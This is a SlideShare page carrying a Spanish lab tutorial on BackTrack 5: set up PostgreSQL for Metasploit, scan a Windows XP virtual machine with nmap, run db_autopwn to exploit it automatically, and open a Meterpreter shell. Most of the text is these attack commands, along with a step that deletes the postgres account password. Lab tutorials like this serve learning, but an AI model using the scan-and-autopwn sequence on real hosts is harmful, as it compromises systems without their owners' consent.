Successfully reported this slideshow.
Your SlideShare is downloading. ×

Db autopwn backtrack_5

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

            Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresq...
Aquí pones el password nuevo.

ALTER USER postgres WITH PASSWORD 'password' ;




después   q

sudo passwd -d postgres

su...
Ahora llamamos a metasploit

msfconsole




db_driver postgresql

y para conectar con la base de datos

db_connect postgre...
Advertisement
Upcoming SlideShare
Backdoor via inyeccion
Backdoor via inyeccion
Loading in …3
×

Check these out next

1 of 5 Ad

More Related Content

Similar to Db autopwn backtrack_5 (20)

Advertisement

Recently uploaded (20)

Db autopwn backtrack_5

  1. 1. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresql Aquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal: apt-get install postgresql libpq-dev el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql. Al finalizar la instalación conectamos con el postgresql y cambiamos el password sudo su postgres -c psql
  2. 2. Aquí pones el password nuevo. ALTER USER postgres WITH PASSWORD 'password' ; después q sudo passwd -d postgres sudo su postgres -c passwd con este se cambia el password Esto es para conectarse del ruby al postgresql. gem install pg
  3. 3. Ahora llamamos a metasploit msfconsole db_driver postgresql y para conectar con la base de datos db_connect postgres:”password”@127.0.0.1/metasploitdb El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar a la base de datos. Ahora utilizamos nmap para ver las vulnerabilidades de la víctima. nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtual de xp sp 1.
  4. 4. Nmap escaneo los puertos e identifico el sistema operativo de la víctima. Ahora procedemos con el ataque. db_hosts db_autopwn -t -p -e AL terminar el autopwn muestra las posibles sesiones. Para entrar a una de ellas sessions -i 1 el numero es la sesión que fue elegida.
  5. 5. Aquí se puede ver como entra al shell de windows desde meterpreter. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

×